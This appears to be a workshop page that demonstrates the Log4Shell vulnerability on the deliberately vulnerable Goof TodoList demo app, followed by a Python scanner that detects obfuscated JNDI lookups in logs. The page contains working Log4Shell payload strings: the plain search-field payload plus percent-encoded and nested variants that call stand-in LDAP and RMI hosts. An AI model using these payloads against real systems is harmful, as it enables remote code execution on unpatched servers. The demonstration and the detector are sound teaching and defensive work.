The Goof repo TodoList application includes various exploits to demonstrate the risks of open source vulnerabilities. We'll demonstrate the infamous Log4Shell vulnerability (CVE-2021-44228 in Apache Log4j 2) as an example of an extremely prolific open source package with a critical CVE that was relatively easy to exploit and gives malicious actors a remote code execution (RCE) attack vector.
This example is best exploited from your browser, so open a tab and navigate to the todolist application's load balancer address with /todolist appended to it. That hostname was stored in the TODOLIST_LB variable during a prior section, so you can get the URL string by echoing it out like this:
echo $TODOLIST_LB/todolist
34.174.166.26/todolist
When you open that URL in your browser, you should see the ToDoList welcome page
Click “Sign in” and log into the form with the following pre-populated user account:
In the search field enter the following string ${jndi:ldap://ldap.darkweb:80/#Vandalize}
and submit the search.
Immediately*, you can see that the header for the entire site has been modified to show the hacker equivalent of graffiti!
* Sometimes the hacked header can take a few seconds to appear. If you don't see the hacked page header immediately, try refreshing the page and/or navigating to another page in the app.
A full rundown of the Log4Shell issue is out of scope for this workshop, but the high level description is: the search term was written to the application log, and when Log4j encountered the string ${jndi:ldap://ldap.darkweb:80/#Vandalize} while formatting that log message it performed a JNDI lookup, querying an LDAP server named ldap.darkweb on port 80 and asking for an object named "/#Vandalize". The server's response caused the application to load and run attacker-supplied bytecode, which in this demo simply rewrote the site header. The returned bytecode could have done far more malicious things, not the least of which would be to open a reverse shell into the container. Note that the attack needed no credentials or special access: any user-controlled value that reaches a Log4j log statement in an affected version (Log4j 2.0-beta9 through 2.14.1) is a potential trigger, including HTTP headers such as User-Agent, not just form fields.
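Because the trigger is a string pattern inside anything Log4j formats, one way to catch attempts like the one above is to scan request logs for JNDI lookups, including the nested and percent-encoded variants attackers used to slip past a naive grep for ${jndi:. The following Python is an added example written for this page, not code from the Goof project; the log lines it scans are constructed for the demo, and evil.example is a placeholder host.

```python
"""Scan log lines for Log4Shell-style JNDI lookups.

Added example for this workshop step (not part of the Goof project).
Resolves the lookup types attackers use to obfuscate payloads
(${lower:..}, ${upper:..}, and ${..:-default} fallbacks) the way
Log4j 2.x would, so that nested forms such as ${${lower:j}ndi:...}
are recognised as well as the plain ${jndi:...} form.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import unquote

# An innermost ${...} lookup: one that contains no further braces.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# What a fully resolved JNDI lookup looks like: jndi:<scheme>:<target>
_JNDI = re.compile(r"^jndi:(?P<scheme>[a-z]+):(?P<target>.*)$", re.IGNORECASE)


@dataclass
class Finding:
    scheme: str      # ldap, ldaps, rmi, dns, ...
    target: str      # everything after "jndi:<scheme>:", e.g. //host:port/name
    resolved: str    # the input after obfuscating lookups were resolved


def _resolve(body: str) -> str:
    """Resolve one innermost lookup body (the text between ${ and })."""
    # ${prefix:name:-default}: Log4j substitutes the default when the
    # lookup fails, which is what payloads like ${::-j} rely on.
    if ":-" in body:
        return body.split(":-", 1)[1]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    # Any other lookup (env, sys, date, ...) becomes an opaque token; its
    # real value does not matter for deciding whether a JNDI lookup exists.
    return "<" + body.split(":", 1)[0] + ">"


def scan(value: str, max_rounds: int = 64) -> Optional[Finding]:
    """Return a Finding if value contains a JNDI lookup, else None.

    Percent-decoding is applied first because the payload usually arrives
    URL-encoded in a query string. Lookups are resolved innermost-first,
    one per round, with a bound so hostile input cannot spin forever.
    """
    current = unquote(value)
    for _ in range(max_rounds):
        match = _INNERMOST.search(current)
        if match is None:
            return None
        body = match.group(1).strip()
        jndi = _JNDI.match(body)
        if jndi:
            return Finding(jndi.group("scheme").lower(), jndi.group("target"), current)
        current = current[: match.start()] + _resolve(body) + current[match.end():]
    return None


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, target) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        finding = scan(line)
        if finding is not None:
            hits.append((number, finding.scheme, finding.target))
    return hits


# Constructed sample access-log lines (not real traffic). Line 2 carries the
# workshop payload percent-encoded; lines 3 and 4 carry obfuscated variants
# in the User-Agent field; lines 1 and 5 are benign.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /todolist/search?q=buy+milk HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET /todolist/search?q=%24%7Bjndi%3Aldap%3A%2F%2Fldap.darkweb%3A80%2F%23Vandalize%7D HTTP/1.1" 200 ua="curl/7.8"',
    '10.0.0.9 - - "GET /todolist/ HTTP/1.1" 200 ua="${${lower:j}ndi:${lower:LDAP}://evil.example/a}"',
    '10.0.0.9 - - "GET /todolist/ HTTP/1.1" 200 ua="${${::-j}${::-n}${::-d}${::-i}:rmi://evil.example/b}"',
    '10.0.0.7 - - "GET /todolist/ HTTP/1.1" 200 ua="Mozilla/5.0 ${date:yyyy}"',
]

if __name__ == "__main__":
    for number, scheme, target in scan_lines(SAMPLE_LINES):
        print(f"line {number}: jndi:{scheme}:{target}")
```

Resolving the obfuscation lookups rather than pattern-matching on them is what makes this robust: every round removes one innermost ${...}, so a payload spelled as ${${::-j}${::-n}${::-d}${::-i}:...} collapses to the same ${jndi:...} the workshop used, while a legitimate ${date:yyyy} in a User-Agent is reduced to an opaque token and produces no hit.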
In the next step we will look into ways to catch and fix vulnerabilities like this.